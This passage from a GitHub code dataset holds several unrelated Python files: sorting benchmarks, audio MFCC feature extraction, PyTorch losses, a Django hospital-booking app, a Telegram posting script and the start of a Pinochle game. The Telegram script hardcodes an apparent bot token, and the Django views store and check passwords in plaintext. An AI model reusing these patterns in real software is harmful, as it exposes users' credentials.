的前面\r\n ar[i+1:j+1] = temp # 并且将原来数组 ar[i] 到 ar[j-1] 的内容后移1个位置\r\n\r\n\r\n# 归并排序\r\ndef MergeSort(ar):\r\n if len(ar) == 1: # 如果数组只有1个元素,返回\r\n return ar[0:1]\r\n\r\n mid = len(ar)//2 # 如果数组元素多于1个, 则将数组分割成两份\r\n a = MergeSort(ar[0:mid]) # 并将两份继续代入函数中去\r\n b = MergeSort(ar[mid:len(ar)])\r\n\r\n c = []\r\n i = j = 0 # 分割的两份数组已分别排好序\r\n while i < len(a) and j < len(b): # 比较两份数组的元素大小, 并将它们按顺序放到一个数组中去\r\n if a[i] < b[j]:\r\n c.append(a[i])\r\n i += 1\r\n else:\r\n c.append(b[j])\r\n j += 1\r\n\r\n if i < len(a):\r\n c += a[i:len(a)]\r\n elif j < len(b):\r\n c += b[j:len(b)]\r\n\r\n return c # 返回合并的有序的数组\r\n\r\n\r\nif __name__ == '__main__':\r\n test_list = {'MergeSort': 121, 'InsertionSort': 122}\r\n\r\n for key, value in test_list.items():\r\n test_func = eval(key)\r\n size_list, time_list = TestSort(test_func)\r\n PlotTestData(test_func, size_list, time_list, value)\r\n\r\n plt.show()\r\n","repo_name":"xuejiekun/algo","sub_path":"Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4800717872","text":"#coding=utf-8\nimport librosa\nimport numpy as np\nimport pandas as pd\nimport argparse\nfrom pysndfx import AudioEffectsChain\nimport math\nimport python_speech_features\nimport scipy as sp\nfrom scipy import signal\nimport os\nfrom glob import glob\n\ndef invlogamplitude(S):\n return 10.0 ** (S / 10.0)\n\ndef reduce_noise_mfcc_down(y, sr):\n hop_length = 512\n n_mfcc = 20\n\n ## librosa\n # mfcc = extract_features_from_song(y, sr, hop_length, n_mfcc)\n # mfcc = librosa.mel_to_hz(mfcc)\n\n ## mfcc\n mfcc = python_speech_features.base.mfcc(y)\n mfcc = python_speech_features.base.logfbank(y)\n mfcc = python_speech_features.base.lifter(mfcc)\n\n sum_of_squares = []\n index = -1\n for r in mfcc:\n sum_of_squares.append(0)\n index = index + 1\n for n in r:\n sum_of_squares[index] = sum_of_squares[index] + n ** 2\n\n strongest_frame = sum_of_squares.index(max(sum_of_squares))\n hz = python_speech_features.base.mel2hz(mfcc[strongest_frame])\n\n max_hz = max(hz)\n min_hz = min(hz)\n\n speech_booster = AudioEffectsChain().highshelf(frequency=min_hz * (-1) * 1.2, gain=-12.0, slope=0.6).limiter(gain=8.0)\n y_speech_boosted = speech_booster(y)\n\n return (y_speech_boosted)\n\ndef trim_silence(y):\n y_trimmed, index = librosa.effects.trim(y, top_db=20, frame_length=2, hop_length=500)\n trimmed_length = librosa.get_duration(y) - librosa.get_duration(y_trimmed)\n return y_trimmed, trimmed_length\n\n\ndef reduce_noise_from_audio(filename):\n x, sr = load_audio_file(filename)\n x_boosted = reduce_noise_mfcc_down(x, sr)\n x_boosted, time_trimmed = trim_silence(x_boosted)\n librosa.output.write_wav(filename, x_boosted, sr)\n \n\ndef generate_audio_from_mfcc(input_shape, mfcc, sr, filename, n_mel=128, n_fft=2048):\n # Build reconstruction mappings,\n n_mfcc = mfcc.shape[0]\n dctm = librosa.filters.dct(n_mfcc, n_mel)\n mel_basis = librosa.filters.mel(sr, n_fft)\n\n # Empirical scaling of channels to get ~flat amplitude mapping.\n bin_scaling = 1.0/np.maximum(0.0005, np.sum(np.dot(mel_basis.T, mel_basis),axis=0))\n\n # Reconstruct the approximate STFT squared-magnitude from the MFCCs.\n recon_stft = bin_scaling[:, np.newaxis] * np.dot(mel_basis.T, invlogamplitude(np.dot(dctm.T, mfcc)))\n\n # Impose reconstructed magnitude on white noise STFT.\n excitation = np.random.randn(input_shape)\n E = librosa.stft(excitation)\n recon = librosa.istft(E/np.abs(E)*np.sqrt(recon_stft))\n\n # store audio in file\n librosa.output.write_wav(filename, recon, sr)\n\n # reduce noise in output file\n # reduce_noise_from_audio(filename)\n\n\n# get Mel-frequency cepstral coefficients\ndef extract_features_from_song(x, sr, hop_length=512, n_mfcc=20):\n mfcc = librosa.feature.mfcc(x, sr=sr, hop_length=hop_length, n_mfcc=n_mfcc)\n return mfcc\n\n# load music file\ndef load_audio_file(filename):\n try:\n x, sr = librosa.load(filename, res_type='kaiser_fast', offset=0, duration=30)\n except Exception as e:\n print(\"Error encountered while parsing file: \", filename)\n print(e)\n return None\n \n return x, sr\n\ndef generate_training_data(songs, n_songs):\n data_X = np.empty([0, 20])\n\n for song in songs:\n x, sr = load_audio_file(song)\n mfcc = extract_features_from_song(x, sr, hop_length=512)\n mfcc = mfcc.transpose()\n data_X = np.concatenate((data_X, mfcc))\n \n X = pd.DataFrame(data_X)\n Y = [X.shift(-1)]\n Y.append(X)\n X = pd.concat(Y, axis=1)\n X.fillna(0, inplace=True)\n data_X = X.values\n\n print(data_X.shape)\n x, y = data_X[:, :20], data_X[:, 20:]\n x = x.reshape(int(x.shape[0] / n_songs), n_songs, x.shape[1])\n y = y.reshape(int(y.shape[0] / n_songs), n_songs, y.shape[1])\n\n print(\"Shape of X: \", x.shape)\n print(\"Shape of Y: \", y.shape)\n\n np.save(\"../../results/train_X_classical_2.npy\", x)\n np.save(\"../../results/train_Y_classical_2.npy\", y)\n\ndef main():\n parser = argparse.ArgumentParser(\n prog = 'Music Generation',\n usage = 'To generate new music sequences using MFCC features',\n description = 'python3 mfcc_to_wav.py -i [Input Filename]',\n epilog = 'MIT Licensce',\n add_help=True \n )\n parser.add_argument('-i', '--input', help = 'Input Filename', required = True)\n parser.add_argument('-o', '--output', help = 'Output Filename', required = True)\n args = parser.parse_args()\n\n input_song_list = [y for x in os.walk(args.input) for y in glob(os.path.join(x[0], '*.wav'))]\n print(\"Generating MFCCs for {0} songs.\".format(len(input_song_list)))\n generate_training_data(input_song_list, len(input_song_list))\n print(\"MFCC Generation complete!\")\n\nif __name__ == '__main__':\n main()","repo_name":"hardiksurana/music-generation","sub_path":"code/LSTM/mfcc_to_wav.py","file_name":"mfcc_to_wav.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"26573421755","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass SimpleWeightedCrossEntropy(nn.Module):\n def __init__(self, cfg):\n nn.Module.__init__(self)\n self._cfg = cfg\n\n def forward(self, output, target, meta=None, return_spatial=False):\n loss = F.cross_entropy(output, target, reduction='none')\n # If GT has padding, ignore the points that are not predictable\n if meta is not None and 'predictable_target' in meta:\n pred_index = meta['predictable_target'].long()\n else:\n pred_index = torch.ones_like(target).long()\n\n spatial_loss = loss\n if self._cfg.loss.binary_balanced:\n loss = 0.5 * loss[pred_index * target > 0].mean() + 0.5 * loss[\n pred_index * (1 - target) > 0].mean()\n else:\n loss = loss[pred_index > 0].mean()\n if return_spatial:\n return loss, spatial_loss\n return loss\n\n\nclass NonZeroWeightedCrossEntropy(SimpleWeightedCrossEntropy):\n def __init__(self, cfg):\n SimpleWeightedCrossEntropy.__init__(self, cfg)\n\n def forward(self, output, target, meta=None, return_spatial=False):\n if meta is not None and 'predictable_target' in meta:\n pred_index = meta['predictable_target']\n else:\n pred_index = torch.ones_like(target)\n\n pred_index = pred_index * (target > 0).long()\n loss = F.cross_entropy(output, (target - 1) % target.max(),\n reduction='none')\n spatial_loss = loss\n\n loss = loss[pred_index > 0].mean() if torch.sum(\n pred_index > 0) else torch.tensor(0.0).to(pred_index.device)\n if return_spatial:\n return loss, spatial_loss\n return loss\n","repo_name":"senthilps8/avmap","sub_path":"models/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"39228290037","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n# CODE NAME HERE\n\n# CODE DESCRIPTION HERE\n\nCreated on 2019-07-26 at 09:39\n\n@author: cook\n\"\"\"\nfrom apero.base import base\nfrom apero.core import constants\nfrom apero.core.core import drs_log\nfrom apero.core.utils import drs_recipe\nfrom apero.core.utils import drs_startup\nfrom apero.tools.module.testing import drs_stats\n\n\n# =============================================================================\n# Define variables\n# =============================================================================\n__NAME__ = 'apero_stats.py'\n__INSTRUMENT__ = 'None'\n__PACKAGE__ = base.__PACKAGE__\n__version__ = base.__version__\n__author__ = base.__author__\n__date__ = base.__date__\n__release__ = base.__release__\n# Get Logging function\nWLOG = drs_log.wlog\n# Get Recipe class\nDrsRecipe = drs_recipe.DrsRecipe\n# Get parameter class\nParamDict = constants.ParamDict\n\n\n# =============================================================================\n# Define functions\n# =============================================================================\n# All recipe code goes in _main\n# Only change the following from here:\n# 1) function calls (i.e. main(arg1, arg2, **kwargs)\n# 2) fkwargs (i.e. fkwargs=dict(arg1=arg1, arg2=arg2, **kwargs)\n# 3) config_main outputs value (i.e. None, pp, reduced)\n# Everything else is controlled from recipe_definition\ndef main(**kwargs):\n \"\"\"\n Main function for apero_log_stats.py\n\n :param kwargs: additional keyword arguments\n\n :keyword debug: int, debug level (0 for None)\n\n :returns: dictionary of the local space\n :rtype: dict\n \"\"\"\n # assign function calls (must add positional)\n fkwargs = dict(**kwargs)\n # ----------------------------------------------------------------------\n # deal with command line inputs / function call inputs\n recipe, params = drs_startup.setup(__NAME__, __INSTRUMENT__, fkwargs)\n # solid debug mode option\n if kwargs.get('DEBUG0000', False):\n return recipe, params\n # ----------------------------------------------------------------------\n # run main bulk of code (catching all errors)\n llmain, success = drs_startup.run(__main__, recipe, params)\n # ----------------------------------------------------------------------\n # End Message\n # ----------------------------------------------------------------------\n return drs_startup.end_main(params, llmain, recipe, success, outputs='None')\n\n\ndef __main__(recipe: DrsRecipe, params: ParamDict):\n \"\"\"\n Main code: should only call recipe and params (defined from main)\n\n :param recipe: DrsRecipe, the recipe class using this function\n :param params: ParamDict, the parameter dictionary of constants\n\n :return: dictionary containing the local variables\n \"\"\"\n # ----------------------------------------------------------------------\n # Main Code\n # ----------------------------------------------------------------------\n # get arguments\n mode = params['INPUTS']['MODE'].upper()\n # set up plotting (no plotting before this)\n recipe.plot.set_location()\n # set output to None initially\n tout, qout, eout, mout, fout = None, None, None, None, None\n # ----------------------------------------------------------------------\n # run the timing stats\n if 'TIMING' in mode or 'ALL' in mode:\n # add plots to params\n params.set('STATS_TIMING_PLOT', value=True)\n # do the timing stats\n tout = drs_stats.timing_stats(params, recipe)\n # ----------------------------------------------------------------------\n # run the qc stats\n if 'QC' in mode or 'ALL' in mode:\n # add plots to params\n params.set('STAT_QC_RECIPE_PLOT', value=True)\n # do the qc stats\n qout = drs_stats.qc_stats(params, recipe)\n # ----------------------------------------------------------------------\n # run the error stats\n if 'ERROR' in mode or 'ALL' in mode:\n # do the error stats\n eout = drs_stats.error_stats(params)\n # ----------------------------------------------------------------------\n # run the memory stats\n if 'MEMORY' in mode or 'ALL' in mode:\n # do the memory stats\n mout = drs_stats.memory_stats(params, recipe)\n # ----------------------------------------------------------------------\n # run the file index stats\n if 'FINDEX' in mode or 'ALL' in mode:\n # do the file index stats\n fout = drs_stats.file_index_stats(params)\n # ----------------------------------------------------------------------\n # combine all outputs into a single file that can be compared between\n # runs\n drs_stats.combine_stats(params, [tout, qout, eout, mout, fout])\n # ----------------------------------------------------------------------\n # End of main code\n # ----------------------------------------------------------------------\n return locals()\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n # run main with no arguments (get from command line - sys.argv)\n ll = main()\n\n# =============================================================================\n# End of code\n# =============================================================================\n","repo_name":"njcuk9999/apero-drs","sub_path":"apero/tools/recipes/bin/apero_stats.py","file_name":"apero_stats.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"5"} +{"seq_id":"33737287191","text":"import base64\nimport os\nimport re\nimport openai\nfrom IPython.display import Markdown, display\n\nopenai.api_type = os.getenv(\"OPENAI_API_TYPE\")\nopenai.api_base = os.getenv(\"OPENAI_API_BASE\")\nopenai.api_version = os.getenv(\"OPENAI_API_VERSION\")\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\ndef get_first_markdown_code_block(string):\n \"\"\"\n This function takes a string as input and returns the first markdown code block found in the string.\n \"\"\"\n pattern = re.compile(r\"```[\\s\\S]*?```\")\n match = pattern.search(string)\n if match:\n return match.group(0)\n else:\n return None\n\n\ndef display_codeblock(output):\n \"\"\"\n This function takes a string as input, parse the first code block and displays it as a markdown codeblock.\n \"\"\"\n display(Markdown(get_first_markdown_code_block(output)))\n\ndef get_system_prompt():\n return \"\"\"\n\"\"\"\n\ndef chatbot_response(system_prompt, user_prompt):\n \"\"\"\n This function takes a user prompt as input and returns the chatbot response.\n \"\"\"\n messages = [{\"role\": \"system\", \"content\": system_prompt}]\n for prompt in user_prompt:\n messages.append({\"role\": \"user\", \"content\": prompt})\n\n response = openai.ChatCompletion.create(\n engine=\"Turbo\",\n # model=\"gpt-3.5-turbo\",\n messages=messages,\n temperature=0.1,\n max_tokens=2048,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0,\n stop=None,\n )\n\n display(Markdown(response[\"choices\"][0][\"message\"][\"content\"]))\n return response[\"choices\"][0][\"message\"][\"content\"]\n\ndef generate_user_prompts_a():\n \"\"\"\n This function takes the active cell content, the cells above and the cells below and generates a prompt for the user.\n \"\"\"\n prompt = []\n prompt.append(\"Print Hello World\")\n return prompt\n","repo_name":"rebornix/notebook-prompts","sub_path":"prompts.py","file_name":"prompts.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74605219351","text":"import requests, json\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import Data, Location, Appointment, Hospital, Slot, Doctor, Volunteer, Phone\nfrom types import SimpleNamespace\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nimport datetime\n# Create your views here.\n\ndef index(request):\n response = requests.get(\"https://api.covid19india.org/state_district_wise.json\")\n covidData = []\n for data in response.json():\n covidData.append(data)\n context = {\n \"locations\" : Location.objects.all(),\n \"covidData\" : covidData\n }\n return render(request, 'pages/index.html', context)\n\n\ndef loadHospitals(request):\n location = request.POST['area']\n local = Location.objects.get(pk=location)\n hospitals = []\n for h in Data.objects.filter(area=local):\n hospitals.append(h)\n context = {\n \"hospitals\" : hospitals\n }\n return render(request, 'pages/hospitals.html', context)\n\n\n\ndef loadData(request):\n state = request.POST['state']\n response = requests.get(\"https://api.covid19india.org/state_district_wise.json\")\n \n districts = []\n for d in response.json()[state]['districtData']:\n districts.append(d)\n\n active = []\n deceased = []\n recovered = []\n for d in districts:\n active.append(response.json()[state]['districtData'][d]['active'])\n for d in districts:\n deceased.append(response.json()[state]['districtData'][d]['deceased']) \n for d in districts:\n recovered.append(response.json()[state]['districtData'][d]['recovered'])\n\n context = {\n \"dist\": districts,\n \"active\": active,\n \"dead\": deceased,\n \"rec\": recovered\n }\n \n return render(request, \"pages/loadData.html\", context)\n\ndef login_view(request):\n if request.user.is_authenticated:\n hosp = []\n app = []\n for h in Hospital.objects.all():\n hosp.append(h)\n for a in Appointment.objects.filter(patient=request.user):\n app.append(a)\n context = {\n \"name\" : request.user.first_name + ' ' + request.user.last_name,\n \"hospitals\": hosp,\n \"appointments\": app\n }\n return render(request, \"pages/welcome.html\", context)\n else:\n if 'hospLog' in request.session:\n return redirect(login_hosp)\n elif 'volLog' in request.session:\n return redirect(login_vol)\n else:\n return render(request, \"pages/login.html\")\n\ndef signIn(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n email = request.POST['emailLog']\n password = request.POST['pwd1']\n user = authenticate(request, username=email, password=password)\n if user is not None:\n login(request, user)\n return redirect(login_view)\n else:\n return render(request, \"pages/login.html\", context={\"error\": \"Incorrect Details!\"})\n\ndef register(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n else:\n if 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n return render(request, \"pages/register.html\")\n\ndef signUpUser(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n else:\n if 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n fname = request.POST['fnameReg1']\n lname = request.POST['lnameReg1']\n email = request.POST['emailReg1']\n phone = request.POST['phoneReg1']\n password = request.POST['pwdReg1']\n user = User.objects.create_user(first_name=fname, last_name=lname, username=email, email=email, password=password)\n phone = Phone.objects.create(user=user, phone=phone)\n user = authenticate(request, username=email, password=password)\n if user is not None:\n login(request, user)\n return redirect(login_view)\n else:\n return HttpResponse(\"Error in creating the account!\")\n\n\ndef logout_view(request):\n if request.user.is_authenticated:\n logout(request)\n if not request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(logout_hosp)\n else:\n return render(request, \"pages/login.html\", context={\"error\": \"User not logged in!\"})\n\ndef signUpHospital(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n count = 0\n for h in Hospital.objects.all():\n count += 1\n hp = count+1\n hID = 'NCR' + str(hp)\n #print(hID)\n name = request.POST.get('hospName')\n address = request.POST.get('hospAddress')\n phone = request.POST.get('hospPhone')\n password = request.POST.get('pwdReg2')\n if Hospital.objects.create( hID=hID, name=name, address=address, contact=phone, password=password):\n request.session['hospLog'] = hID\n print(\"reached\")\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Cannot register hospital\")\n\ndef login_hosp(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'volLog' in request.session:\n return redirect(login_vol)\n else:\n slots = []\n doctors = []\n app = []\n if 'hospLog' in request.session:\n if request.session['hospLog']:\n for h in Hospital.objects.all():\n if h.hID == request.session['hospLog']:\n for s in Slot.objects.filter(hospital=h):\n slots.append(s)\n for d in Doctor.objects.filter(hospital=h):\n doctors.append(d) \n for a in Appointment.objects.filter(hospital=h):\n app.append(a)\n context = {\n \"name\": h,\n \"hid\": h.hID,\n \"slots\": slots,\n \"doctors\": doctors,\n \"appointments\": app\n }\n return render(request, \"pages/hospfunction.html\", context)\n else:\n return redirect(logout_hosp)\n else:\n slots = []\n doctors = []\n app = []\n hID = request.POST.get('hospID')\n password = request.POST.get('pwd2')\n for h in Hospital.objects.all():\n if h.hID == hID and h.password == password: \n request.session['hospLog'] = hID \n for s in Slot.objects.filter(hospital=h):\n slots.append(s) \n for d in Doctor.objects.filter(hospital=h):\n doctors.append(d) \n for a in Appointment.objects.filter(hospital=h):\n app.append(a) \n context = {\n \"name\": h,\n \"hid\": hID,\n \"slots\": slots,\n \"doctors\": doctors,\n \"appointments\": app\n }\n return render(request, \"pages/hospfunction.html\", context)\n \n return HttpResponse(\"Invalid Credentials\")\n\n\ndef logout_hosp(request):\n if 'hospLog' in request.session:\n del request.session['hospLog']\n return redirect(login_view)\n else:\n return render(request, \"pages/login.html\", context={\"error\": \"Hospital ID Not Logged In!\"})\n\n\ndef addSlot(request):\n if 'hospLog' in request.session:\n hID = request.POST.get('hospitalID')\n h = Hospital.objects.get(hID=hID)\n time1 = request.POST.get('Timing1')\n max1 = request.POST.get('bookTiming1')\n time2 = request.POST.get('Timing2')\n max2 = request.POST.get('bookTiming2')\n time3 = request.POST.get('Timing3')\n max3 = request.POST.get('bookTiming3')\n \n if Slot.objects.create(hospital=h, timing1=time1, max_appointments1=max1, timing2=time2, max_appointments2=max2, timing3=time3, max_appointments3=max3, book1=0, book2=0, book3=0):\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Cannot create slot!\")\n\n else:\n return redirect(login_hosp)\n\ndef slotDel(request):\n if 'hospLog' in request.session:\n sID = request.POST.get('slotID')\n s = Slot.objects.get(pk=sID)\n s.delete()\n return redirect(login_hosp)\n else:\n return redirect(login_hosp)\n\ndef addDoc(request):\n if 'hospLog' in request.session: \n name = request.POST.get('name')\n spec = request.POST.get('spec')\n hId = request.POST.get('hospitalID')\n h = Hospital.objects.get(hID=hId)\n slot = request.POST.get('slot')\n s = Slot.objects.get(pk=slot)\n fees = request.POST.get('fees')\n if Doctor.objects.create(doctor=name, hospital=h, spec=spec, slot=s, fees=fees):\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Cannot add doctor.\")\n else:\n return redirect(login_hosp)\n\ndef delDoc(request):\n if 'hospLog' in request.session:\n dID = request.POST.get('docID')\n d = Doctor.objects.get(pk=dID)\n d.delete()\n return redirect(login_hosp)\n else:\n return redirect(login_hosp)\n\ndef loadHosp(request):\n if request.user.is_authenticated:\n hosp = request.POST.get('hosp')\n h = Hospital.objects.get(pk=hosp)\n doc = []\n for d in Doctor.objects.filter(hospital=h):\n doc.append(d)\n context = {\n \"doctors\": doc,\n \"hosp\": hosp\n }\n return render(request, \"pages/bookApp1.html\", context)\n else:\n return redirect(login_view)\n\ndef loadDoc(request):\n if request.user.is_authenticated:\n slot = []\n hosp = request.POST.get('hosp')\n doc = request.POST.get('doc')\n d = Doctor.objects.get(pk=doc)\n for s in Slot.objects.all():\n if s == d.slot:\n if s.book1 < s.max_appointments1:\n slot.append(s.timing1)\n if s.book2 < s.max_appointments2:\n slot.append(s.timing2)\n if s.book3 < s.max_appointments3:\n slot.append(s.timing3)\n if slot:\n context = {\n \"doc\": doc,\n \"slots\": slot,\n \"hosp\": hosp,\n \"sID\": s.id\n }\n else:\n return HttpResponse(\"Daily Appointments Limit Reached!\")\n return render(request, \"pages/bookApp2.html\", context)\n else:\n return redirect(login_view)\n\ndef bookSlot(request):\n if request.user.is_authenticated:\n hosp = request.POST.get('hosp')\n h = Hospital.objects.get(pk=hosp)\n doc = request.POST.get('doc')\n d = Doctor.objects.get(pk=doc)\n sID = request.POST.get('sid')\n s = Slot.objects.get(pk=sID)\n timing = request.POST.get('slot')\n if s.timing1 == timing:\n s.book1 += 1\n elif s.timing2 == timing:\n s.book2 += 1\n elif s.timing3 == timing:\n s.book3 += 1\n if Appointment.objects.create(patient=request.user, doc=d, hospital=h, slot=s, confirmation='Yes', timings=timing):\n hosp = []\n app = []\n for h in Hospital.objects.all():\n hosp.append(h)\n for a in Appointment.objects.filter(patient=request.user):\n app.append(a)\n context = {\n \"name\" : request.user.first_name + ' ' + request.user.last_name,\n \"hospitals\": hosp,\n \"appointments\": app,\n \"success\": \"Successfully booked appointment!\"\n }\n return render(request, \"pages/welcome.html\", context)\n else:\n return HttpResponse(\"Cannot book an appointment!\")\n else:\n return redirect(login_view)\n\ndef compApp(request):\n if 'hospLog' in request.session:\n aId = request.POST.get('aid')\n print(aId)\n a = Appointment.objects.get(pk=aId)\n if a:\n print(a)\n a.complete = True\n a.save()\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Could not find the appointment!\")\n else:\n return redirect(login_view)\n\ndef signUpVol(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n fname = request.POST.get(\"fname\")\n lname = request.POST.get(\"lname\")\n org = request.POST.get(\"org\")\n contact = request.POST.get(\"volPhone\")\n pwd = request.POST.get(\"pwd\")\n v = Volunteer.objects.create(first=fname, last=lname, organization=org, contact=contact, password=pwd)\n if v:\n request.session['volLog'] = v.id\n return redirect(login_vol)\n else:\n return HttpResponse(\"Cannot Create Volunteer Account!\")\n\ndef login_vol(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n elif 'volLog' in request.session:\n context = {\n \"volunteer\": Volunteer.objects.get(pk=request.session['volLog'])\n }\n return render(request, \"pages/volunteer.html\", context)\n else:\n vid = request.POST.get('vID')\n pwd = request.POST.get('pwd')\n v = Volunteer.objects.get(pk=vid)\n if v:\n if v.password == pwd:\n request.session['volLog'] = vid\n context = {\n \"volunteer\": v\n }\n return render(request, \"pages/volunteer.html\", context)\n else:\n return HttpResponse(\"Invalid Password!\")\n else: \n return HttpResponse(\"Invalid Credentials!\")\n \n return redirect(login)\n\ndef logout_vol(request):\n if 'volLog' in request.session:\n del request.session['volLog']\n return redirect(login_view)\n else:\n return redirect(login_view)\n\n\nnow = datetime.datetime.now()\n\nnewday = now.replace(hour=23, minute=59, second=59, microsecond=0)\n\nif now == newday:\n for s in Slot.objects.all():\n s.book1 = s.book2 = s.book3 = 0 \n for a in Appointment.objects.all():\n a.delete()\n\nprint(now)","repo_name":"ayushb2002/keepingSafe","sub_path":"Management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8745043165","text":"#import schedule\n#import time\nimport requests\n#from bs4 import BeautifulSoup as soup\n#import requests as req\n#import re\n#import html2text\n#import os\n#import errno\ntoken='402534967:AAH-vMKfI1OlpNnusY0HD5kpWDGn2QJl3AA'\nmethod='sendMessage'\n\n \n \nresponse = requests.post(\n url='https://api.telegram.org/bot{0}/{1}'.format(token, method),\n data={'chat_id': '@testqw', 'text': 'hi'}\n ).json()\nprint('ddd')\nprint(response)\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"MahmoodabadiHamid/agahi_amlak_01","sub_path":"other/sendTelegramMassage.py","file_name":"sendTelegramMassage.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2136353386","text":"\"\"\" DTO Models \"\"\"\nimport datetime\nfrom src.core.models.user import User\nfrom src.core.helpers.enums import LoginUserType\n\n# pylint: disable=invalid-name\n\n\nclass LoginUserDto:\n \"\"\" Login User DTO \"\"\"\n\n def __init__(self, jsonObject):\n if jsonObject is not None:\n self.is_valid = False\n\n self.client_id = jsonObject.get('clientId')\n self.client_secret = jsonObject.get('clientSecret')\n self.email = jsonObject.get('email')\n self.password = jsonObject.get('password')\n self.refresh_token = jsonObject.get('refreshToken')\n if self.client_id:\n self.is_valid = True\n if self.email and self.password:\n self.type = LoginUserType.CREDENTIALS\n elif self.refresh_token:\n self.type = LoginUserType.REFRESH_TOKEN\n else:\n self.is_valid = False\n\n\nclass AuthTokenDto:\n \"\"\" Authentication Token DTO\"\"\"\n\n def __init__(self, access_token: str, refresh_token: str, user: User, token_type: str):\n self.accessToken = access_token\n self.refreshToken = refresh_token\n self.pid = user.pid\n self.roles = user.roles\n self.tokenType = token_type\n self.is_verified = user.is_verified\n\n\nclass AccessTokenDto:\n \"\"\" Access Token DTO\"\"\"\n\n def __init__(self, user: User or object, uclient_id: int = None):\n if uclient_id is not None:\n self.aid = uclient_id\n self.uid = user.id_\n self.exp = datetime.datetime.now().timestamp() + 3 * 3600\n self.roles = user.roles\n else:\n self.aid = user['aid']\n self.exp = None\n self.uid = user['uid']\n self.roles = user['roles']\n","repo_name":"sassani/python_base_api","sub_path":"src/core/models/dtos.py","file_name":"dtos.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24757585589","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom .models import UserProfile\nfrom checkout.models import Order\nfrom .forms import UserProfileForm\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n\n@login_required\ndef profiles(request):\n \"\"\"Simple View to render page and display profile\"\"\"\n profile = get_object_or_404(UserProfile, user=request.user)\n\n if request == 'POST':\n form = UserProfileForm(request.POST, instance=profile)\n if form.is_valid():\n form.save()\n messages.success(request, 'Profile Updated')\n else:\n messages.error(request, 'Something Went Wrong')\n else:\n form = UserProfileForm(instance=profile)\n orders = profile.orders.all()\n\n template = 'profiles/profiles.html'\n context = {\n 'form': form,\n 'orders': orders,\n }\n\n return render(request, template, context)\n\n\ndef order_history(request, order_number):\n order = get_object_or_404(Order, order_number=order_number)\n\n template = 'checkout/checkout_success.html'\n context = {\n 'order': order,\n 'from_profile': True,\n }\n\n return render(request, template, context)\n","repo_name":"leeton1412/mile-stone","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"7622931186","text":"\"\"\"\nThis is the module that handles Pinochle game play.\n\"\"\"\nimport json\nimport uuid\nfrom typing import List, Optional\n\nfrom flask import abort, make_response\nfrom flask.wrappers import Response\n\nfrom . import (\n game,\n gameround,\n hand,\n player,\n round_,\n roundteams,\n score_meld,\n score_tricks,\n setup_logging,\n team,\n trick,\n)\nfrom .cards import utils as card_utils\nfrom .cards.const import SUITS\nfrom .cards.deck import PinochleDeck\nfrom .cards.utils import convert_to_svg_names, deal_hands\nfrom .models import utils\nfrom .models.game import Game\nfrom .models.gameround import GameRound\nfrom .models.hand import Hand\nfrom .models.player import Player\nfrom .models.round_ import Round\nfrom .models.roundteam import RoundTeam\nfrom .models.trick import Trick\nfrom .ws_messenger import WebSocketMessenger as WSM\n\nLOG = setup_logging()\n\n# Also contained in cardtable.py because the browser doesn't need\n# access to play_pinochle.py\nclass GameModes:\n modes = [\"game\", \"bid\", \"bidfinal\", \"reveal\", \"meld\", \"trick\"]\n _mode = 0\n\n def get_mode_str(self) -> str:\n return self.modes[self._mode]\n\n def reset(self):\n self.set(0)\n\n def set(self, mode: int = 0):\n self._mode = mode\n\n def next(self):\n \"\"\"\n Advance to next game mode, skipping over the first element when\n wrapping around.\n \"\"\"\n self._mode += 1\n self._mode %= 